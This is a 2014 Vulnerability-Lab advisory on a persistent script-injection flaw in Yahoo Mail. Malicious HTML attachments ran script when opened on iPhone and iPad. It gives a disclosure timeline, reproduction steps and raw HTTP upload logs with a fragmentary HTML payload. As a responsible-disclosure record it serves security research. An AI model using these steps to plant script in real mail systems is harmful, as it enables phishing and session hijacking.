Document Title: =============== Yahoo! Bug Bounty #30 YM - Application-Side Mail Encoding (File Attachment) Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1137 Release Date: ============= 2014-07-08 Vulnerability Laboratory ID (VL-ID): ==================================== 1137 Common Vulnerability Scoring System: ==================================== 5.3 Product & Service Introduction: =============================== Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail, Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports and its social media website. It is one of the most popular sites in the United States. According to news sources, roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts `more than half a billion consumers every month in more than 30 languages. (Copy of the Vendor Homepage: http://www.yahoo.com ) Abstract Advisory Information: ============================== The Vulnerability-Laboratory Research Team has discovered a persistent input validation vulnerability in the official Yahoo! Mail Service web-application. Vulnerability Disclosure Timeline: ================================== 2013-11-08: Researcher Notification & Coordination (Ateeq ur Rehman Khan - Core Research Team) 2013-11-09: Vendor Notification (Yahoo! Security Team - Bug Bounty Program) 2014-02-18: Vendor Response/Feedback (Yahoo! Security Team - Bug Bounty Program) 2014-06-01: Vendor Fix/Patch (Yahoo! Developer Team - Reward: HackerOne Program) 2014-07-08: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Yahoo! Product: Yahoo! Mail - Web Application & API 2013 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent script code inject web vulnerability has been discovered in the official Yahoo Mail Service web-application & API. The vulnerability affects the Yahoo Mail Mobile Application for iPhone, iPad and iPod touch. The vulnerability allows attackers to upload / attach own malicious .html files and send them to other Yahoo users. During the testing, it was discovered that using Yahoo mail, it is possible to include malicious script code within .html files and send them as attachments to other users. It seems that the application is not performing proper validation When uploading user attached files. Upon viewing these attached files from your iphone/ipad device, the malicious script code gets executed directly hence leaving the victims vulnerable to persistent client side attacks. The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.3. Exploitation of this vulnerability requires low user interaction. Successful exploitation of this vulnerability results in persistent phishing, persistent client side redirects, user session hijacking and similar client side attacks. Request Method(s): [+] POST Vulnerable Application(s): [+] Yahoo! Mail - Web Application Vulnerable Module(s): [+] Compose Mail > File Attachments Vulnerable Parameter(s): [+] Attach File Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged yahoo web application account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Register an yahoo mail account and login to the account system 2. Open the `compose a New Yahoo email` section 3. Click the `attach file` button in the compose mail section 4. Attach the POC.html file provided along with this advisory 5. Send out the email with the malicious test attachment to another yahoo test account 6. Using your iPad/iPhone device, click on the attachment link of the newly received POC email 7. You should now see an iframe with vulnerability labs website proving the existence of this vulnerability 8. Successful reproduce of the yahoo mail service vulnerability! --- PoC Session Logs --- POST /us.f1624.mail.yahoo.com/ya/upload_with_cred?output=php&cred=Encrypted HTTP/1.1 Host: bf1-attach.mail.yahoo.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://us-mg6.mail.yahoo.com/neo/launch?.rand=7sd8nun2neu5c Content-Length: 561 Content-Type: multipart/form-data; boundary=---------------------------234701259230567 Origin: http://us-mg6.mail.yahoo.com Cookie: Hidden Connection: keep-alive Pragma: no-cache Cache-Control: no-cache -----------------------------234701259230567 Content-Disposition: form-data; name="filename POC.html -----------------------------234701259230567 Content-Disposition: form-data; name="filesize" 120 -----------------------------234701259230567 Content-Disposition: form-data; name="Filedata"; filename="POC.html" Content-Type: text/html '%3d'>">/927 ">

Testing POC Ateeq -----------------------------234701259230567 Response: HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: http://us-mg6.mail.yahoo.com Cache-Control: private Connection: Keep-Alive Content-Length: 322 Content-Type: text/xml Date: Fri, 08 Nov 2013 19:12:53 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Server: HTTP/1.1 UserFiberFramework/1.0 Vary: Accept-Encoding Via: HTTP/1.1 r03.ycpi.ac4.yahoo.net UserFiberFramework/1.0 uploadAVNoVirus e2fd91b75b55018624eef056c5913b0f POC.html text/html 126